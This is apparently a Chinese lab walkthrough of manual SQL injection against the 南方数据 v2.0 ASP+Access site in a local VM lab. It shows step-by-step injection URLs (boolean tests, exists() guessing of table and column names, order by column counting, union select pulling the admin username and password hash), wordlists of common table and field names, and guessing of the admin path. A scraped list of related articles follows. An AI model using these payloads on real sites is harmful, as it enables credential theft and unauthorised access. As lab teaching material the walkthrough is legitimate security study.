ASP+ACCESS注入—主要靠猜实现

一、 环境平台
 实验平台 小旋风ASPWeb服务器
 目标网站 南方数据2.0
 虚拟机:Win s03-1(靶机) wins03-2(攻击 )

环境设置:
 两台虚拟均设置为NAT模式
 VM软件:编辑—虚拟网络编辑器 中 设置为NAT模式 且勾选“选用本地DHCP……”
 将两台虚拟机设置成同一网段

准备工作
1、 win s03-1(服务器) 中
 安装小旋风ASP服务器
 将南方数据企业网站管理系统 v2.0 解压 复制至小旋风ASP服务器C:\Program Files\小旋风AspWebServer\wwwroot下
 安装EditPlus编辑软件
2、 查询两台虚拟机IP地址:win s03-1(攻击机) :192.168.71.130
win s03-2(攻击机) :192.168.71.128
3、 测试:在真机或win s03-1中浏览器 输入 192.168.71.128 -----服务器地址 出现南方数据企业网站管理系统网页

攻击实施
1、 查找有参数传递的页面
如“业内资讯”栏目中的“南方数据企业网站管理系统 V2.0”项超链接
发现页面网址为http://192.168.71.128/shownews.asp?id=23 有参数传递(GET方式)
2、 构造URL网址参数—判断-数据库漏洞注入点:

  1. 第一次网址构造测试:
    http://192.168.71.128/shownews.asp?id=23 and 1=1
    分析:
     URL: http://192.168.80.128/shownews.asp?id=23
    在shownews.asp 文件中相当于执行了SQL语句:
    select * from news where id=23 为什么?
    因为: win s03-1中利用EditPlus文本编辑软件打开shownews.asp文件
    通过搜索 select关键词找到31行:
    sql=“select * from news where id=”& owen
    其中owen 查看第二行 <%owen=request(“id”)%>
     测试语句:
    http://192.168.80.128/shownews.asp?id=23 and 1=1
    相当于:select * from news where id=23 and 1=1
    回车发现 页面无变化,正常反应
  2. 第二次网址构造测试:
    构造:
    http://192.168.80.128/shownews.asp?id=23 and 1=2
    相当于:select * from news where id=23 and 1=2
    回车发现 页面变化,数据库报错 说明此处有数据库漏洞的注入点
    3、 猜表名— exists函数
     构造:
    http://192.168.80.128/shownews.asp?id=23 and exists (select * from admin)
    #猜测是否有admin表
     执行后报错----说明没有admin表 还可以猜测manage/user等表名
     直到猜测到manage_user时:页面显示正常
    http://192.168.80.128/shownews.asp?id=23 and exists (select * from manage_user)
    相当于:select * from news where id=16 and exists (select * from manage_user)
    说明表名为:manage_user
     常见表名:
    admin user adminuser manage manager manage_user
    4、 猜字段名— exists函数
     猜测是有否:user字段
    http://192.168.80.128/shownews.asp?id=23 and exists (select username from manage_user)
    猜对正常显示,猜错报错
     猜测是有否:password字段
    http://192.168.80.128/shownews.asp?id=23 and exists (select username,password from manage_user)
    显示正常
    备注:常见字段名
    账号:name username user_name admin adminuser admin_user admin_username adminname
    密码:password pass userpass user_pass pwd userpwd adminpwd admin_pwd
    5、 利用order by判断manage_user表中有几个字段
    目的:判断manage_user有几个字段,主要是为后续利用union 显示用户名和密码需要,因为union 需要后面的select匹配前面的select 字段数,所以首先要知道前面的字段数
     首先尝试
    http://192.168.80.128/shownews.asp?id=23 order by 20
    相当于:select * from news where id=23 order by 20
     利用二分法快速查询
     直到:
    http://192.168.80.128/shownews.asp?id=23 order by 11 显示正常, 说明manage_user表有十一个字段
    6、 利用union 联合查询— 构造显示 manage_user表中username password字段内容
     构造
    http://192.168.80.128/shownews.asp?id=23 union select 1,2,3,4,5,6,7,8,9,10,11 from manage_user

    从显示图上看到,2、3两个位置可显示内容
     二次构造
    http://192.168.80.128/shownews.asp?id=23 union select 1,username,password,4,5,6,7,8,9,10,11 from manage_user

    显示:用户名为:admin
    密码为(MD5值):3acdbb255b45d296 实际值为:0791idc

    7、 查找后台
    查找后台页面也是一个技术活,也需要去猜
     http://192.168.71.128/admin1 显示404报错信息,说明没有admin1这个文件夹

 http://192.168.71.128/ads 显示403报错信息,说明有ads这个文件夹,,但或隐藏文件或你没有权限方位
 http://192.168.71.128/admin1 显示出后台管理界面 可用用户名 admin密码 0791idc 进入
备注:网站后台管理入口一般存放在名为admin或是manage的网站子目录下,也可以在管理入口页面源代码中寻找字段名

ASP+ACCESS注入—主要靠猜实现相关推荐

  1. SQL注入系列之环境搭建(一)----ASP+ACCESS注入环境搭建

    一.常见网站搭建组合 操作系统:windows linux 搭建平台:iis apache uginx tomcat 脚本格式:asp php aspx jsp cgi war py pl do js ...

  2. access注入大全

    access注入 access偏移注入 access搜索型注入 access登陆框注入 1.判断注入. and 1=1 and 1=2 或者 -0 -1 看页面的变化 2. access注入. 联合查 ...

  3. 小迪教程第三天——access注入片段

    1.Sql注入产生条件 1.必须有参数传递 2.参数值带入数据库查询并执行 2.access注入攻击片段-联合查询法 1.判断注入 2.猜解表名 3.猜解列名 4.猜解数据 猜解表名的过程如下: 1) ...

  4. Access注入详细笔记

    ACCESS 注入 01 漏洞产生原理 注入 是针对数据库语句注入(所以识别数据库类型很重要),注入漏洞产生于脚本 注入产生于数据交互的地方 1.网站分类 静态网页 html或者htm,是一种静态的页 ...

  5. asp access的安全:不要认为简单的改后缀mdb为asp就能防下载

    asp access的安全:不要认为简单的改后缀mdb为asp就能防下载 昨天和animator试验了一下,把data.mdb文件改名为data.asp文件后放在wwwroot目录里.然后在IE中输入 ...

  6. ASP+Access UTF-8 网页乱码问题解决办法

    用ACCESS数据库和ASP做网站时用UTF-8编码有时会出现乱码,再者网页出错或者刷新页面后就是乱码,如果数据库取值乱码在开头加上<%@LANGUAGE="VBSCRIPT" ...

  7. 发现WinSRV2003SP1并没有包含ASP+Access的BUG更新

    看了Windows Server 2003 SP1的LIST后,发现解决Win2003上运行ASP+Access的BUG补丁没有包含在里面.很郁闷,真的很郁闷!苦苦等待的关键性更新却没有包含,看来微软 ...

  8. ASP+Access中文乱码的解决方法,ASP中文乱码,asp乱码问题

    确保编码声明正确(例:时尚淘女之家http://www.tao36524.com) 如果您使用的是国外空间,默认是西欧而不是GB2312,你可以通过强制为GD2312的方式! 在数据提取页面的第一行代 ...

  9. asp+Access程序在Windows Server 2003 Enterprise Edition服务器上运行时无法显示备注字段的解决方法...

    最近公司让软件公司开发了一个网站,使用asp+Access,可是软件公司上传到服务器上后页面无法显示数据库中的备注字段的内容,给软件公司打电话,那边的开发人员说: 问题:服务器上asp无法直接显示Ac ...

最新文章

  1. 康泰瑞影推高性能3D/4D超声可视化方案
  2. c++primer第五版,p134页第2题自编程序
  3. P3521-[POI2011]ROT-Tree【线段树合并】
  4. 教程:如何实现Java OAuth 2.0以使用GitHub和Google登录
  5. LeetCode——1721.交换链表中的节点
  6. android 原生开发 3d地图 下载_arcgis api 3.x for js 入门开发系列二不同地图服务展示(附源码下载)...
  7. 接口可以继承多个接口总结
  8. WPS个人版安装VBA教程
  9. EDA技术实用教程 | 复习九 | 数据选择器的行为级描述
  10. 课堂秩序难管理?这个方法造福师生
  11. “数据闭环定义芯片”助力汽车智能化升级,辉羲智能亮相上海车展
  12. WeUI实例(官方)
  13. ​力扣解法汇总728-自除数
  14. 合肥工业大学2020-2021学年《数据挖掘》实验报告(Python实现)
  15. idea实现注册登录时使用QQ邮箱激活功能
  16. iOS 制作推送证书的流程 超详细!!!!!
  17. Java 17 新特性
  18. Vue extends拓展任意组件功能(el-select实例)-两种写法
  19. Win8系统,装成win10系统的步骤
  20. scanner.next() 与 scanner.nextLine() 的区别(随手记)

热门文章

  1. CEF 进程间消息传递
  2. php骑手轨迹_轨迹分析,如何解决车辆定位与道路的偏差?|斑马数智技术内参...
  3. 光耦,磁耦,容耦的区别
  4. FutureTask源码解析二
  5. Java项目:基于jsp+mysql+Spring+SpringMVC+mybatis的农产品网上销售系统
  6. ,因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.microso ft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies
  7. 【ARM-Linux开发】【QT开发】Couldnt load module input, no modules loaded
  8. 手机设置代理后无法上网
  9. java可视化界面背景图_Java界面:java设置背景图片
  10. webInspect SprinBoot2.x安全整改